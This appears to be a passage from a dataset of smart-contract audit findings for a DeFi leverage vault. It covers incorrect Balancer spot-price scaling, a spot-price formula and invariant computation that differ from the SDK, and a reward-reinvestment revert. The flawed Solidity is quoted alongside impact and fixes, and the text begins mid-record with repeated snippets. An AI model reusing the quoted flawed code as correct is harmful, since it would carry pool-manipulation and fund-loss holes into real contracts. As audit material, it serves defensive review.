0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
The spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\n
The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade to execute against the manipulated pool, leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.
```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
Incorrect Spot Price
high
Multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on the `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK's provide a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code in the Leverage Vault to compute $b$ is not equivalent to the above.\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, for a composable pool, it can support up to five (5) tokens in a pool. $S$ should be as follows, where $balances$ is all the tokens in a composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). Otherwise, this was not implemented within the code.
Given multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK and due to the lack of information on the web, it is recommended to reach out to the Balancer's protocol team to identify the actual formula used to determine a spot price of any two tokens within a composable pool and check out if the formula in the SDK is up-to-date to be used against the composable pool.\\nIt is also recommended to implement additional tests to ensure that the `_calcSpotPrice` returns the correct spot price of composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.
The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n
Incorrect invariant used for Balancer's composable pools
high
Only two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\n
Review if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.
An incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price to prevent any pool manipulation. As a result, incorrect spot price leads to false positives or false negatives, where, in the worst-case scenario, pool manipulation was not caught by this function, and the transaction proceeded to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.
```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n
Unable to reinvest if the reward token equals one of the pool tokens
high
If the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token. Thus leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must be a token within a pool and must be ordered in sequence according to the token index of the pool.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssuming the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). This example is taken from a live Curve pool on Ethereum (Reference 1 Reference 2)\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, if the protocol receives 3000 CVX reward tokens and it intends to sell 1000 CVX for crvUSD and 1000 CVX for WETH.\\nThe `trades` list has to be defined as below.\\n```\\ntrades[0].sellToken[0] = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken[1] = CRV (rewardToken) | trades[1].buyToken = WETH | trades[0].amount = 1000\\ntrades[1].sellToken[2] = CRV (rewardToken) | trades[1].buyToken = CRV | trades[0].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` function within the `_executeRewardTrades` will always revert.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that within the `_isInvalidRewardToken` function it checks if the reward token to be sold is any of the pool tokens. In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Consider tracking the number of pool tokens received during an emergency exit, and segregate these tokens with the reward tokens. For instance, the vault has 3000 CVX, 1000 of them are received during the emergency exit, while the rest are reward tokens emitted from Convex/Aura. In this case, the protocol can sell all CVX on the vault except for the 1000 CVX reserved.
The reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.
```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n